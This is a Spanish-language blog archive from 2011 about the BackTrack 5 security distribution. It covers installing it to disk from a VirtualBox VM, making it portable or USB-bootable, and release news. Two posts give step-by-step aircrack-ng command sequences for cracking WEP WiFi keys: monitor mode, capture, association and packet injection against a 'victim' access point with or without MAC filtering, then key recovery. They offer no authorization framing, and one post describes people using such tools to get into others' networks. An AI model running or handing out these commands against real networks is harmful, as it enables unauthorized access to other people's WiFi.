jueves, 15 de diciembre de 2011


Instalar BackTrack 5 en tu disco duro desde Windows
Puede que el título suene un poco extraño. Pero sí, se puede instalar un sistema operativo en el disco duro físico real (BackTrack Linux en este caso) dentro de otro y de forma bastante sencilla.
¿Cómo?
Utilizando un sistema de virtualización, como VirtualBox o VMWare, crearemos una máquina virtual que use nuestro disco duro físico real e instalaremos en él el sistema que queramos, como si fuese uno virtualizado, pero lo que instalemos permanecerá en nuestro disco duro real.
¿Por qué?
Hay buenas razones para instalar BackTrack (u otro operativo) desde una máquina virtual:
  • Evitas tener que grabar la imagen, y por tanto el CD. Aunque sea en un USB siempre es pesado hacerlo.
  • No tienes que reiniciar el PC.
  • Puedes seguir trabajando con tu PC mientras instalas y/o actualizas tu nuevo sistema operativo.
  • Los drives que emulan VirtualBox o BackTrack son reconocidos sin problemas por todos los sistemas operativos. Esto nos da la posibilidad de instalar el SO y después arreglar el problemas de drivers (como la tarjeta gráfica, por ejemplo).
  • Y, como no… ¡Es curioso y digno de probar!
¿Qué necesito?
  • VirtualBox (para el ejemplo usaremos este) o VMWare.
  • La ISO de BackTrack.
Pasos a seguir
1 - Crear la máquina virtual
Crearemos la máquina virtual como si fuésemos a virtualizar un Linux cualquiera. Cuando lleguemos al punto en el que nos pida disco duro omitimos el  paso:

2 – Creamos el disco duro virtual asociado al físico
Para hacer esto ejecutamos el siguiente comando:
Windows:
C:\Archivos de programa\Oracle\VirtualBox\VBoxManage internalcommands createrawvmdk -filename "c: \Users\MYUSER\VirtualBox VMs\Backtrack5\backtrack_real.vmdk" -rawdisk \\ .\PhysicalDrive0
* Sustituir MYUSER por vuestro usuario.
* Backtrack5 es el nombre que le habéis dado a la máquina virtual.
Linux:
VBoxManage internalcommands createrawvmdk -filename /home/MYUSER/VirtualBox\ VMs/Backtrack5/backtrack_real.vmdk -rawdisk /dev/sda
* Sustituir sda por vuestro disco primario. sda/hda/scsi...
* Sustituir MYUSER por vuestro usuario.
* Para poder ejecutar este comando tu usuario tiene que pertenecer al grupo "disk". NO crear con "sudo", os dará muchos problemas. Para añadirse al grupo "disk" ejecutar: sudo gpasswd –a USUARIO disk.
3 – Asociamos el disco a la maquina virtual
Seleccionamos la máquina virtual y pulsamos el botón "configuración". Después asociamos el disco recién creado en el menú:

4 – Añadimos el CD de autoarranque o la ISO
Al igual que si fuéramos a instalar Backtrack en nuestro PC físico necesitamos un CD, o la ISO -que es más fácil-, para instalación. La asociamos:

5 – Cambiamos el orden de arranque
Igual que haríamos en un PC físico:

6 – Arrancamos e instalamos normalmente
Y por fin, ya podemos instalar Backtrack. Los pasos son exactamente los mismos que si la instaláramos físicamente: Tendremos que seleccionar la partición adecuada, crear el swap, etc etc
CUIDADO CON LOS CAMBIOS QUE HACEIS. SI BORRAIS UNA PARTICIÓN SE BORRARÁ DEL DISCO DURO FÍSICO.
En la imagen obseramos como la distribución de disco que muestra una partición de Windows (además de otras). Esto es debido a que es mi disco físico
 
Como siempre: comentarios, ruegos y preguntas…
¡Saludos a todos!
Referencias
Fuente: http://www.iniqua.com/2011/11/17/instalando-backtrack-5-en-nuestro-disco-duro-desde-windows/




lunes, 5 de septiembre de 2011

Última actualización disponible de BackTrack 5 R1

BackTrack 5 R1

BackTrack 5 R1 es la última actualzación que ha sido liberada para que los usuarios amantes de la seguridad informática puedan conocer las novedades y usar esta nueva versión de una de las mejores distribuciones de Linux.
La última actualización de Backtrack se basa en la versión de Ubuntu 10.04 y que fue lanzada en el mes de Mayo de este año. En esta versión como siempre ha ocurrido, se han corregido algunos errores y mejorado aspectos de rendimiento y bugs de seguridad que fueron encontrados en la versión anterior.
Por otro lado se ha actualizado el Kernel de Linux 2.6.38 que ahora cuenta con parches de inyección inalámbrica, en las versiones 4.6 de KDE y 2.6 de GNOME… haciendo que el trabajo de expertos en informática sea mejor aún.
BackTrack es muy conocido en el mundo de la seguridad de redes inalámbricas, puesto que hay personas que usan sus conocimientos para hackear y sacar las contraseñas de estas redes, penetrando y accediendo a Internet, en donde usan una de las tantas aplicaciones de análisis y diagnostico que se encuentran en el LiveCD.
Ya lo sabes entonces si contabas con la versión BackTrack 5, puedes descargar la nueva distribución gratuitamente con tan sólo ingresar al sitio oficial para conseguirla.

Página Oficial: Backtrack-linux.org

jueves, 26 de mayo de 2011

CRACKEO DE ENCRIPTACION WEP CON BACKTRACK 5 REVOLUTION


CRACKEO DE ENCRIPTACION WEP CON BACKTRACK 5 REVOLUTION
Abrimos una Terminal (consola 1):
1.    Configurar la secuencia de Arranque de la PC (USB o Lectora como primer dispositivo de arranque), donde este el BackTrack.
2.    Escribimos el comando startx para cargar el Entorno Grafico
3.    Ponemos la tarjeta en modo monitor con airmon-ng
airmon-ng start [nombre tarjeta inalámbrica]   --> wlan0, wlan1, ath0,.
Ejemplo: airmon-ng start wlan0
En modo monitor, la tarjeta quedara renombrada como: mon0 o mon1
4.    Escaneamos las redes wireless con airodump-ng
airodump-ng [nombre tarjeta inalámbrica]      --> mon0, mon1…..
Ejemplo: airodump-ng mon0
Verificamos el canal (CH) en el que está trabajando la red al cual atacaremos.
5.    Presionamos Ctrl + c para detener el escaneo.
6.    Escaneamos las la red seleccionada en un canal especifico y guardamos la captura en un archivo con airodump-ng
airodump-ng -c [numero canal] –w [nombre archivo]  [nombre tarjeta wifi]
Ejemplo: airodump-ng –c 6 –w wep mon0
Caso 1: Red sin Filtro de MAC:
Abrimos otra Terminal (consola 2):
1.    Nos asociamos a la red inalámbrica con aireplay-ng
aireplay-ng -1 0 -a [MAC AP Victima] [nombre tarjeta wifi]
Ejemplo: aireplay-ng -1 0 –a 11:22:33:44:55:66 mon0
2.    Empezamos a inyectar paquetes a la red asociada con aireplay-ng
aireplay-ng -3 -b [MAC AP Victima] [nombre tarjeta wifi]
Ejemplo: aireplay-ng -3 –b 11:22:33:44:55:66 mon0
Caso 2: Red con Filtro de MAC:
Abrimos otra Terminal (consola 2):
1.    Nos asociamos a la red inalámbrica con aireplay-ng
aireplay-ng -1 0 -a [MAC AP Victima] –h [MAC cliente Victima]  [nombre tarjeta wifi]
Ejemplo: aireplay-ng -1 0 –a 11:22:33:44:55:66 -h 66:55:44:33:22:11 mon0
2.    Empezamos a inyectar paquetes a la red asociada con aireplay-ng
aireplay-ng -3 -b [MAC AP Victima] –h [MAC cliente Victima]  [nombre tarjeta wifi]
Ejemplo: aireplay-ng -3 –b 11:22:33:44:55:66 -h 66:55:44:33:22:11 mon0
Abrimos otra Terminal (consola 3):
1.    Una vez capturado una gran cantidad de datos (Data) vamos a crackear la red inalámbrica con aircrack-ng
aircrack-ng [filename]-01.cap
Ejemplo: aircrack-ng wep-01.cap

Nota: Para reiniciar la PC escribimos el comando init 6 en una terminal.

Descargar manual

miércoles, 18 de mayo de 2011

BackTrack 5 Portable

Para crear un BackTrack 5 Portable necesitamos:

¿Cuantas veces no hemos necesitado correr una copia de BackTrack sobre un entorno windows?, Muchas ¿no? y en algunas veces ni siquiera podemos reiniciar la maquina o instalar una maquina virtual, por eso les traigo una pequeña guía para llevar nuestro BackTrack (o cualquier otro sistema operativo) de forma portable en nuestra memoria USB, sobre cualquier maquina con Microsoft Windows .

Para crear un BackTrack Portable necesitamos:

Primero necesitamos la herramienta Moka5 que la podemos descargar aquí, también necesitamos la ISO del BackTrack podemos bajarla aquí, una vez tienes las herramientas necesarias, empezaremos a crear nuestro BackTrack portable en nuestra memoria USB.
1). Ejecutamos el instalador del Moka5 y seleccionamos la opción “Install on a portable storage device (e.g. iPod, USB storage device)”.
 Nos aparecerá el siguiente pantallazo:

Donde debemos escoger la opción “Make you own LivePC”, la otra opción es para descargar o ejecutar en línea algunas maquinas prefabricadas (al parecer ya no están disponibles después de que moka5 se volviera comercial).
5). Ahora configuramos el titulo de la maquina virtual, el icono y la ruta del CD-ROM o ISO.
En este paso puedes escoger la opción que te guste mas, te voy a comentar los pros y contras de las 2 opciones de instalación local.
  • Physical CD/DVD: Si escoges esta opción la maquina virtual buscara el sistema en tu lector de CD/DVD, esto te ahorra espacio en tu memoria USB (no tendrás que copiar la ISO del BT en ella) aunque la carga del sistema (como Live CD) es mas lenta y te ocupa el lector, si piensas instalar el BT en esta maquina no importa que opción escojas.
  • Local ISO file: Con esta opción la maquina ejecuta el sistema desde la ISO alojada en la memoria USB, inicia mas rápido (como Live CD) y si necesitas espacio en tu memoria para otra cosa solo tienes que eliminar la ISO (luego la vuelves a copiar), si vas a instalar el BT en la maquina y tu memoria es de 1GB debes copiar la ISO en el PC (la instalación completa del BackTrack ocupa mas de 1GB, si tienes una memoria esa capacidad tienes que instalarlo como “Live”).
6). Ahora configuramos el tipo de sistema que instalaremos en nuestra maquina virtual, escogemos “Linux” y “Other Linux 2.6.x kernel” ya que el BackTrack tiene esa versión del kernel.
Con esto hemos terminado la configuración de nuestra maquina virtual portable para ejecutar BackTrack desde una memoria USB en entornos windows, ahora iniciamos nuestro BackTrack y escogemos la opción que mas nos agrade para trabajar, a mi me gusta el entorno KDE así que inicio con el, pero tu puedes iniciar por el que quieras (ahora que en la versión 5 tenemos tantas opciones), esperamos que termine la carga del sistema y tendremos nuestro BackTrack totalmente operativo.
Puedes instalar tu BackTrack o trabajar con el en Live CD, si quieres configurar mas a fondo tu maquina puedes hacer click en “advance options” cuando te encuentres en el paso 5 y podrás configurar la red, los dispositivos USB, el tamaño del disco virtual, ademas es posible usar el moka5 para llevar de forma portable otro sistema, sigue el mismo procedimiento, pero en el paso 6 lo configuran según el sistema que vas a instalar.
PD. Recuerda que al estar ejecutando BackTrack en una maquina virtual NO RECONOCERÁ tu hardware, por lo tanto herramientas como la suite aircrack no funcionara, moka5 tiene soporte para dispositivos USB, solo de esta forma podrás hacer uso de dispositivos como bluetooth o tarjetas inalámbricas.
PD2. Articulo original creado el 21 diciembre 2007 pero actualizado por petición de varias personas.

Fuente: http://www.dragonjar.org/backtrack-portable.xhtml




lunes, 16 de mayo de 2011

Instalar BackTrack 5 'Revolution' en una Memoria USB (Pendrive)

Instalar BackTrack 5 'Revolution' en una USB

BackTrack es una genial distribucion para la auditoria de seguridad y relacionada con la seguridad informática en general, la precente publicación muestra como instalar Backtrack 4 r2 en una memoria usb, para el presente ejemplo utilizamos versión de UNebootin para linux, pero tambien UD. puede usar la versión de UNebootin  para Windows. Con los siguientes pasos podran instalar Backtrack 4 r2 a su memoria  (pendrive) usb y utilizarla en cualquier laptop o computadora que permita inciar unidades usb.
Requisitos:
Ya que tengamos todo esto listo tenemos que insertar nuestra usb y abrir el Unetbootin, si no nos deja ejecutarlo tenemos que darle permisos de ejecucion, con la terminal:
chmod +x unetbootin-linux-377
o podemos darle click derecho > Propiedades > Permisos y seleccionamos Permitir ejecutar el archivo como un programa.
En el Unetbootin seleccionamos imagen de iso y buscamos el lugar donde se encuentre nuestra imagen de backtrack, abajo tenemos que seleccionar el tipo, en este caso es unidad USB y seleccionamos nuestra unidad, aqui una captura:


Ahora solo damos click en aceptar y empezaran a copiarse Backtrack a nuestra usb y estara lista para iniciarse sin necesidad de un CD o DVD.
Enlaces:

domingo, 15 de mayo de 2011

BackTrack 5 ‘Revolution’ ya está aquí


BackTrack 5, disponible la mejor distro de seguridad y auditoría
Ya está disponible para descarga y uso la nueva versión de la distribución GNU/Linux BackTrack especializada en seguridad y auditoría informática, muy apreciada entre la comunidad por sus test de penetración. 


BackTrack 5 (nombre en clave ‘revolution’ está basada en la distro Ubuntu 10.04 LTS con kernel 2.6.38 y entornos de escritorio KDE 4.6 y GNOME 2.6. Incluye soporte hardware mejorado y extendido especialmente para chips de conexión inalámbrica Wi-Fi y multitud de herramientas.

Como de costumbre, y además de la auditoría Wireless su potencial es infinito incluyendo numerosos escáneres de puertos y vulnerabilidades, análisis forense, archivos de exploits, sniffers…

BackTrack 5 está disponible para descarga en arquitecturas x86 de 32 y 64 bits con entornos GNOME y KDE. También imagen para el sistema de virtualización VMware y por primera vez una versión para arquitectura RISC ARM.

Descarga libre y uso gratuito de esta gran distribución GNU/Linux (nuestra preferida del sector de seguridad informática) que puedes instalar en disco o probar desde CD/DVD o USB sin modificar tu equipo bajo el formato Live. 

Link de descarga: http://www.backtrack-linux.org/downloads/

sábado, 12 de marzo de 2011

Hackear contraseña de WiFi con Backtrack 4

Hackear contraseña de WiFi con Backtrack 4
 Este muy bien hecho video tutorial (disponible en HD!) demuestra lo simple que es conseguir la contraseña de una red WiFi (que esté utilizando WEP), con el programa Backtrack.  



Los programas necesarios, los encontrarán aquí
http://www.backtrack-linux.org
http://www.imgburn.com
Necesitarán también un disco en blanco para poder correr el programa (es un ISO)

Mientras que los comandos utilizados, son estos:
Startx
/etc/init.d/networking start
airmon-ng
airmon-ng stop [wireless card name]
airmon-ng start [wireless card name]
airmon-ng
airodump-ng [wireless card name]
ctrl c
airodump-ng w wep c [channel number] bssid [Bssid number] [wireless card name]
aireplay-ng -1 0 a [bssid] [wireless card name]
aireplay-ng -3 b [bssid][wireless card name]
ctrl + c
dir
aircrack-ng [filename]

Fuente: http://www.youtube.com/watch?v=jETwvEDaJeQ&feature=player_embedded